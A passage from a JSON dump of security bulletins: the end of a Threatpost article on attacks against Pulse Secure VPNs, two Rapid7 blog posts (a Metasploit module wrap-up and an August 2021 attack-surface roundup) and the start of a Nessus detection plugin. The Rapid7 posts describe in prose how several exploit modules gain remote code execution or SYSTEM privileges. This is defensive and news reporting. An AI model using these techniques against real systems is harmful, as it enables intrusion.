UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors.\u201d\n\n## **Pulse Secure: A Favorite Target for APTs**\n\nPulse Secure VPNs continue to be a hot target for nation-state actors. Last week, [the FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n\nMeanwhile, earlier in April, the Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n\nAnd last fall, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n\u201cAlmost without fail, the common thread with any APT is the exploitation of known vulnerabilities both new and old,\u201d Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, said via email. \u201cMalicious activity, whether using a supply-chain vector or a VPN authentication bypass, is thwarted by good cyber-hygiene practices and serious blue teaming. Vulnerability management, or more importantly vulnerability remediation, is a cybersecurity dirty job that is under-resourced and underappreciated and businesses are paying the price.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-21T15:35:37", "type": "threatpost", "title": "Pulse Secure Critical Zero-Day Security Bug Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T15:35:37", "id": "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "href": "https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-01-08T22:48:37", "description": "## Struts2 Multi Eval OGNL RCE\n\n\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) added [`exploit/multi/http/struts2_multi_eval_ognl`](<https://github.com/rapid7/metasploit-framework/pull/14521>), which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times ([CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) and [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>)). The [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which is handled automatically by the module. The OGNL gadget chain for [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) will echo the command output. Both chains use a simple mathematical expression to ensure that evaluation occurs. These vulnerabilities are application dependent, and the user does need to know which CVE they are targeting. Setting the `NAME` parameter appropriately and using the check method to ensure evaluation takes place inside an HTML attribute are key to successful exploitation.\n\n## JuicyPotato-like Windows privilege escalation exploit\n\nExploit module [`exploits/windows/local/bits_ntlm_token_impersonation`](<https://github.com/rapid7/metasploit-framework/pull/14046>) was added by Metasploit contributor [C4ssandre](<https://github.com/C4ssandre>). It exploits BITS connecting to a local Windows Remote Management server (WinRM) at startup time. A fake WinRM server listening on port `5985` is started by a `DLL` loaded from a previous unprivileged meterpreter session. The fake server triggers BITS and then steals a `SYSTEM` token from the subsequent authentication request. The token is then used to start a new process and launch `powershell.exe` as the `SYSTEM` user. It downloads a malicious PowerShell script and executes it on a second local HTTP server, not writing any files to disk. The exploit is based on [decoder's PoC](<https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/>). It has been successfully tested on Windows 10 (10.0 Build 19041) 32 bits.\n\n## Pulse Connect Secure Gzip RCE\n\nMetasploit contributor [h00die](<https://github.com/h00die>) added an [exploit](<https://github.com/rapid7/metasploit-framework/pull/14368>) that targets Pulse Connect Secure server version `9.1R8` and earlier. The vulnerability was originally discovered by the [NCC Group](<https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/>). It achieves authenticated remote code execution as `root` by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by [rxwx](<https://github.com/rxrx>), who shared the encryption code with the author. Admin credentials are required for successful `root` access. The module has been tested against server version `9.1R8`.\n\n## New modules (8)\n\n * [SpamTitan Unauthenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14330>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Felipe Molina](<https://github.com/felmoltor>), which exploits [CVE-2020-11698](<https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698?referrer=blog>)\n * [Pulse Secure VPN gzip RCE](<https://github.com/rapid7/metasploit-framework/pull/14368>) by [David Cash](<https://research.nccgroup.com/author/dcashncc/>), [Richard Warren](<https://uk.linkedin.com/in/rich-warren-437a7841>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [h00die](<https://github.com/h00die>), which exploits [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=blog>)\n * [Apache Struts 2 Forced Multi OGNL Evaluation](<https://github.com/rapid7/metasploit-framework/pull/14521>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), Matthias Kaiser, [Spencer McIntyre](<https://github.com/zeroSteiner>), and [ka1n4t](<https://github.com/ka1n4t>), which exploits [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) and [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>)\n * [SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.](<https://github.com/rapid7/metasploit-framework/pull/14046>) by Andrea Pierini ([decoder](<https://github.com/decoder>)), Antonio Cocomazzi (splinter_code), [Cassandre](<https://github.com/C4ssandre>), and Roberto ([0xea31](<https://github.com/0xea31>))\n * [Shodan Host Port](<https://github.com/rapid7/metasploit-framework/pull/14429>) by [natto97](<https://github.com/natto97>)\n * [WordPress Duplicator File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14497>) by Hoa Nguyen - SunCSR Team and Ramuel Gall, which exploits [CVE-2020-11738](<https://attackerkb.com/topics/judia21wRt/cve-2020-11738?referrer=blog>)\n * [WordPress Easy WP SMTP Password Reset](<https://github.com/rapid7/metasploit-framework/pull/14474>) by [h00die](<https://github.com/h00die>), which exploits [CVE-2020-35234](<https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234?referrer=blog>)\n * [WordPress Total Upkeep Unauthenticated Backup Downloader](<https://github.com/rapid7/metasploit-framework/pull/14568>) by Wadeek and [h00die](<https://github.com/h00die>)\n\n## Enhancements and features\n\n * PR [14566](<https://github.com/rapid7/metasploit-framework/pull/14566>) from [zeroSteiner](<https://github.com/zeroSteiner>) Module `auxiliary/server/socks_proxy` replaces `modules/auxiliary/server/socks4a.rb` and `modules/auxiliary/server/socks5.rb`.\n * PR [14538](<https://github.com/rapid7/metasploit-framework/pull/14538>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves Metasploit's XML importer error messages when data is not Base64 encoded.\n * PR [14528](<https://github.com/rapid7/metasploit-framework/pull/14528>) from [zeroSteiner](<https://github.com/zeroSteiner>) Clarifies Windows Meterpreter payloads description support of XP SP2 or newer.\n * PR [14522](<https://github.com/rapid7/metasploit-framework/pull/14522>) from [axxop](<https://github.com/axxop>) Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify rememberMe cookie encryption key.\n * PR [14517](<https://github.com/rapid7/metasploit-framework/pull/14517>) from [timwr](<https://github.com/timwr>) Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.\n * PR [14509](<https://github.com/rapid7/metasploit-framework/pull/14509>) from [egypt](<https://github.com/egypt>) This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.\n * PR [14444](<https://github.com/rapid7/metasploit-framework/pull/14444>) from [dwelch-r7](<https://github.com/dwelch-r7>) Adds a couple of missing methods from the remote data services for adding and deleting routes.\n\n## Bugs fixed\n\n * PR [14589](<https://github.com/rapid7/metasploit-framework/pull/14589>) from [timwr](<https://github.com/timwr>) Fixes a file download issue with the Android Meterpreter's download command.\n * PR [14532](<https://github.com/rapid7/metasploit-framework/pull/14532>) from [bcoles](<https://github.com/bcoles>) Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.\n * PR [14530](<https://github.com/rapid7/metasploit-framework/pull/14530>) from [jmartin-r7](<https://github.com/jmartin-r7>) Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.\n * PR [14475](<https://github.com/rapid7/metasploit-framework/pull/14475>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixes the EICAR canary check.\n * PR [14334](<https://github.com/rapid7/metasploit-framework/pull/14334>) from [Summus-git](<https://github.com/Summus-git>) Fixes a x86 linux bind shell payloads socket closing bug.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-12-17T10%3A49%3A21-06%3A00..2021-01-07T10%3A58%3A16%2B00%3A00%22>)\n * [Full diff 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/compare/6.0.22...6.0.25>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-01-08T19:54:36", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-11698", "CVE-2020-11738", "CVE-2020-17530", "CVE-2020-35234", "CVE-2020-8260"], "modified": "2021-01-08T19:54:36", "id": "RAPID7BLOG:5482AC1594C82A230828023816657B57", "href": "https://blog.rapid7.com/2021/01/08/metasploit-wrap-up-93/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-09-09T00:04:57", "description": "According to its self-reported version, the version of Pulse Policy Secure running on the remote host is prior to 9.1R9. It is, therefore, affected by the following vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "Pulse Policy Secure < 9.1R9 (SA44601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2019-11358", "CVE-2020-8255", "CVE-2020-8260", "CVE-2020-8261", "CVE-2020-8262", "CVE-2020-8263", "CVE-2020-15352"], "modified": "2021-06-23T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_policy_secure"], "id": "PULSE_POLICY_SECURE-SA44601.NASL", "href": "https://www.tenable.com/plugins/nessus/142057", "sourceData": "##\n# (c) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142057);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/23\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2019-11358\",\n \"CVE-2020-8255\",\n \"CVE-2020-8260\",\n \"CVE-2020-8261\",\n \"CVE-2020-8262\",\n \"CVE-2020-8263\",\n \"CVE-2020-15352\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0495\");\n\n script_name(english:\"Pulse Policy Secure < 9.1R9 (SA44601)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Policy Secure running on the remote host is prior to\n9.1R9. It is, therefore, affected by the following vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated\n attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary\n cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true,\n {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Policy Secure version 9.1R9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8260\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN gzip RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 